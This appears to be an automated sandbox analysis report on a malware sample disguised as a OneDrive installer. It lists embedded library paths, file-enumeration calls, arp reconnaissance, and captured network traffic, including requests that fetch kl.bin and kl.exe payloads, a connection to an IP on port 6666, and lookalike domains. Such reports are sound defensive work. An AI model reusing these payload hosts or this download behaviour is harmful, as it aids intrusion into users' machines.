                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: bin.exe, 00000017.00000003.1572509011.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: bin.exe, 00000017.00000003.1614187153.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: bin.exe, 00000017.00000003.1603538546.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1601628106.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: bin.exe, 00000017.00000003.1610160975.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: bin.exe, 00000017.00000003.1629944717.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: bin.exe, 00000017.00000003.1595260385.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: bin.exe, 00000017.00000003.1566361355.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb source: bin.exe, 00000017.00000003.1678131607.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netstandard.pdb.mdb source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1508105244.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\build\xra_common\webview_3497\Release_tjfuyun\webview.pdb source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1607566852.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: bin.exe, 00000017.00000003.1571122939.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: bin.exe, 00000017.00000003.1602379822.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: bin.exe, 00000017.00000003.1639573458.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: bin.exe, 00000017.00000003.1581060305.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: bin.exe, 00000017.00000003.1641668329.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: bin.exe, 00000017.00000003.1620645331.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: bin.exe, 00000017.00000003.1589104804.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: bin.exe, 00000017.00000003.1545410871.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: bin.exe, 00000017.00000003.1617348748.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: bin.exe, 00000017.00000003.1535471188.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: bin.exe, 00000017.00000003.1512120926.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: bin.exe, 00000017.00000003.1531102979.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1617972564.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1551600625.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: bin.exe, 00000017.00000003.1569651251.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: bin.exe, 00000017.00000003.1646188460.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: bin.exe, 00000017.00000003.1616704287.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: bin.exe, 00000017.00000003.1551101243.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: bin.exe, 00000017.00000003.1589953846.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: bin.exe, 00000017.00000003.1642655283.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: bin.exe, 00000017.00000003.1633728741.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: bin.exe, 00000017.00000003.1536326659.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: bin.exe, 00000017.00000003.1593483290.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: bin.exe, 00000017.00000003.1615509654.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: bin.exe, 00000017.00000003.1629430171.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: bin.exe, 00000017.00000003.1565839959.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: bin.exe, 00000017.00000003.1538662280.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: bin.exe, 00000017.00000003.1544903906.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: bin.exe, 00000017.00000003.1579218741.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: bin.exe, 00000017.00000003.1568304896.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: bin.exe, 00000017.00000003.1529710100.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001D.00000000.1811026709.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001D.00000002.1813119826.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000002.1855324120.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000000.1813487867.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.1856420036.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.1857742975.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: bin.exe, 00000017.00000003.1577151692.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: bin.exe, 00000017.00000003.1605485031.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: bin.exe, 00000017.00000003.1597283206.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: bin.exe, 00000017.00000003.1558254585.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: bin.exe, 00000017.00000003.1598931157.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: F:\dbs\sh\odct\0201_092045\client\onedrive\Setup\standalone\exe\obj\amd64\OneDriveSetup.pdb source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1570344266.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: bin.exe, 00000017.00000003.1612215932.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: bin.exe, 00000017.00000003.1583783784.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: bin.exe, 00000017.00000003.1574773739.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Videos\bin.exe Code function: 23_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_00405C4D
                Source: C:\Users\Public\Videos\bin.exe Code function: 23_2_0040689E FindFirstFileW,FindClose,23_2_0040689E
                Source: C:\Users\Public\Videos\bin.exe Code function: 23_2_00402930 FindFirstFileW,23_2_00402930
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File opened: C:\Users\user\AppData\Roaming
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File opened: C:\Users\user
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File opened: C:\Users\user\AppData
                Source: global traffic TCP traffic: 192.168.2.4:49721 -> 143.92.56.59:6666
                Source: global traffic TCP traffic: 192.168.2.4:49740 -> 8.8.8.8:53
                Source: global traffic HTTP traffic detected: GET /kl.bin HTTP/1.1 Host: aa-1348336590.cos.ap-hongkong.myqcloud.com Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /kl.exe HTTP/1.1 Host: aa-1348336590.cos.ap-hongkong.myqcloud.com Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: POST /logs?api-version=1.0.0 HTTP/1.1 App-Secret: 5b3d0aea-eb78-41e4-bd41-80da14e98e58 Install-ID: 336fab04-90f8-43c8-9867-f5969890c615 Content-Type: application/json; charset=utf-8 Host: in.appcenter.ms Content-Length: 570 Expect: 100-continue Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: POST /logs?api-version=1.0.0 HTTP/1.1 App-Secret: 5b3d0aea-eb78-41e4-bd41-80da14e98e58 Install-ID: 336fab04-90f8-43c8-9867-f5969890c615 Content-Type: application/json; charset=utf-8 Host: in.appcenter.ms Content-Length: 2055 Expect: 100-continue Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1 Host: ws-ap1.pusher.com Upgrade: websocket Connection: Upgrade Sec-WebSocket-Version: 13 Sec-WebSocket-Key: Yzc2OWMzNWYtODlkMC00NQ== Origin: ws://ws-ap1.pusher.com
                Source: Joe Sandbox View IP Address: 183.60.146.66
                Source: Joe Sandbox View IP Address: 77.88.44.55
                Source: Joe Sandbox View IP Address: 23.98.101.155
                Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49714 -> 43.132.105.214:443
                Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49722 -> 43.132.105.214:443
                Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: www.baidu.com Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Source: unknown TCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknown TCP traffic detected without corresponding DNS query: 23.98.101.155
                Source: unknown TCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknown TCP traffic detected without corresponding DNS query: 183.60.146.66
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_006615A5 URLDownloadToFileW,URLDownloadToCacheFileW,DeleteFileW,9_2_006615A5
                Source: global traffic HTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1 Host: d1dmgcawtbm6l9.cloudfront.net User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
                Source: global traffic HTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1 Host: d1dmgcawtbm6l9.cloudfront.net User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
                Source: global traffic HTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1 Host: d1dmgcawtbm6l9.cloudfront.net User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
                Source: bin.exe, 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
                Source: global traffic; DNS traffic detected: DNS query: aa-1348336590.cos.ap-hongkong.myqcloud.com
                Source: global traffic; DNS traffic detected: DNS query: www.baidu.com
                Source: global traffic; DNS traffic detected: DNS query: ws-ap1.pusher.com
                Source: global traffic; DNS traffic detected: DNS query: www.yandex.com
                Source: global traffic; DNS traffic detected: DNS query: www.google.com
                Source: global traffic; DNS traffic detected: DNS query: in.appcenter.ms
                Source: global traffic; DNS traffic detected: DNS query: nal.fqoqehwib.com
                Source: global traffic; DNS traffic detected: DNS query: nit.crash1ytics.com
                Source: global traffic; DNS traffic detected: DNS query: d1dmgcawtbm6l9.cloudfront.net
                Source: global traffic; DNS traffic detected: DNS query: chr.alipayassets.com
                Source: unknown; HTTP traffic detected: POST /logs?api-version=1.0.0 HTTP/1.1
                    App-Secret: 5b3d0aea-eb78-41e4-bd41-80da14e98e58
                    Install-ID: 336fab04-90f8-43c8-9867-f5969890c615
                    Content-Type: application/json; charset=utf-8
                    Host: in.appcenter.ms
                    Content-Length: 570
                    Expect: 100-continue
                    Connection: Keep-Alive
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/xx/oasis-2004xx-wss-soap-message-security-1.1#ThumbprintSHA1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0Jurn:oasis:names:tc:SAML:1.0
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
